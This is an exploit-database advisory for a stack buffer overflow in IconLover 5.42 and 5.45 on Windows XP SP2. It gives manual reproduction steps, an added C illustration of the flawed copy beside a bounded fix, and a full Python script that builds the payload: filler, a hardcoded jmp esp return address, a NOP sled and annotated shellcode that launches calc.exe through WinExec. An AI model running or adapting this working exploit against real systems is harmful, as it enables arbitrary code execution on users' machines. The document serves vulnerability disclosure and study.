Vendor: IconLover
By: cor3sm4sh3r
CVSS: 7.5 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: IconLover
Affected Version From: 5.42
Affected Version To: 5.45
Patch Exists: YES
Related CWE: N/A
CPE: a:aha-soft:iconlover
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Professional SP2
2015

IconLover v5.42 Buffer Overflow Exploit

A buffer overflow vulnerability exists in IconLover v5.42 and v5.45. An attacker can exploit it by copying the content of exploit.txt to the clipboard, running IconLover.exe, choosing File -> New Icon Library, selecting the library and pressing the Download button, pasting the AAAA+... string into the Website Address (URL) input, clicking OK and hiding the dialog. Successful exploitation opens an instance of calc.exe.

Mitigation:

Upgrade to the latest version of IconLover.
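As an added illustration that is not IconLover's code (the advisory never shows the vulnerable routine), the CWE-119 pattern behind this report in C: an unbounded copy of user-controlled URL text into a fixed-size stack buffer, beside a bounded replacement that refuses input which would not fit. The buffer size, the function names and the sample URL are assumptions; the 1039-byte filler only mirrors the length of the junk in the published payload.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size, chosen for illustration; the real application's size is not
 * given in the advisory. */
#define URL_BUF_SIZE 1024

/* Vulnerable form (CWE-119): strcpy copies until the NUL terminator, so any input
 * longer than URL_BUF_SIZE - 1 bytes runs past the end of 'url' and overwrites the
 * saved frame pointer and return address that follow it on the stack. Only ever
 * call this with input known to fit; it is here to show the pattern. */
void download_from_url_unsafe(const char *input)
{
    char url[URL_BUF_SIZE];
    strcpy(url, input);                 /* no length check */
    printf("downloading %s\n", url);
}

/* Hardened form: measure the input without reading past out_size, reject anything
 * that would not fit together with its terminator, copy exactly that many bytes and
 * always NUL-terminate. Returns 0 on success, -1 when the input is rejected. */
int store_url(const char *input, char *out, size_t out_size)
{
    size_t len = 0;

    if (input == NULL || out == NULL || out_size == 0)
        return -1;
    while (len < out_size && input[len] != '\0')
        len++;
    if (len == out_size)                /* no room for the terminator: reject */
        return -1;
    memcpy(out, input, len);
    out[len] = '\0';
    return 0;
}

/* Same entry point as the unsafe version, but the copy is bounded. Oversized input
 * is refused instead of corrupting the stack. */
int download_from_url_safe(const char *input)
{
    char url[URL_BUF_SIZE];

    if (store_url(input, url, sizeof url) != 0)
        return -1;
    printf("downloading %s\n", url);
    return 0;
}

/* Constructed test input: n bytes of 'A', the shape of the advisory's "AAAA+..."
 * string. The caller frees the result. */
char *make_filler(size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL)
        return NULL;
    memset(s, 'A', n);
    s[n] = '\0';
    return s;
}

int main(void)
{
    char *big = make_filler(1039);      /* same length as the advisory's junk */
    if (big == NULL)
        return 1;
    printf("short URL accepted: %d\n",
           download_from_url_safe("http://example.invalid/icons.icl") == 0);
    printf("1039-byte URL rejected: %d\n", download_from_url_safe(big) == -1);
    free(big);
    return 0;
}
```

The length check runs before any byte is copied, so the decision to reject does not depend on what the oversized input contains; this is the property a fix for the Download dialog's URL field needs, whichever string function the vendor actually used.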

Exploit-DB raw data:

# Exploit Title: IconLover v5.42 Buffer Overflow Exploit
# Date: 29/09/2015
# Exploit Author: cor3sm4sh3r
# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/in/cor3sm4sh3r
# Twitter: https://twitter.com/cor3sm4sh3r
# Category: Local
# Tested: Win XP Professional SP2


'''
Credits & Authors:
==================
ZwX (http://zwx.fr/)
[http://www.vulnerability-lab.com/show.php?user=ZwX]

#References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1609

Affected Product(s):
====================
AHA-Soft
Product: IconLover - Software (Windows) 5.42 and 5.45


Manual steps to exploit...
1. Copy the content of exploit.txt to your clipboard
2. Run the IconLover.exe software
3. Click the File -> New Icon Library option
4. Click the Library and push the Download button
5. Paste the AAAA+... string into the Website Address (URL) input, click OK and hide
6. Successful exploitation will open an instance of calc.exe!

'''


#!/usr/bin/env python
# badchars = "\x00\x0a\x0d"
# The payload is built from byte strings and written in binary mode so the bytes
# reach exploit.txt unchanged under Python 3 as well as Python 2.
junk    = b"\x41" * 1039            # filler up to the saved return address
eip     = b"\xed\x1e\x94\x7c"       # jmp esp 7c941eed ntdll.dll (XP SP2)
nopsled = b"\x90" * 20

shellcode  = b"\x33\xc0"             #=> XOR EAX,EAX          |  Zero out EAX register
shellcode += b"\x50"                 #=> PUSH EAX             |  Push EAX to have null-byte padding for "calc.exe"
shellcode += b"\x68\x2E\x65\x78\x65" #=> PUSH ".exe"          |  Push the ASCII string to the stack
shellcode += b"\x68\x63\x61\x6C\x63" #=> PUSH "calc"          |
shellcode += b"\x8B\xC4"             #=> MOV EAX,ESP          |  Put a pointer to the ASCII string in EAX
shellcode += b"\x6A\x01"             #=> PUSH 1               |  Push uCmdShow parameter to the stack
shellcode += b"\x50"                 #=> PUSH EAX             |  Push the pointer to lpCmdLine to the stack
shellcode += b"\xBB\x4d\x11\x86\x7C" #=> MOV EBX,7C86114d     |  Move the pointer to WinExec() into EBX
shellcode += b"\xFF\xD3"             #=> CALL EBX
shellcode += b"\x33\xc0"             #=> XOR EAX,EAX          |  Zero out EAX register
shellcode += b"\x50"                 #=> PUSH EAX             |  Push EAX
shellcode += b"\xBB\xa2\xca\x81\x7c" #=> MOV EBX,7C81caa2     |  Exit process
shellcode += b"\xFF\xD3"             #=> CALL EBX

packet = junk + eip + nopsled + shellcode + nopsled

with open('exploit.txt', 'wb') as f:   # binary mode: no newline translation
    f.write(packet)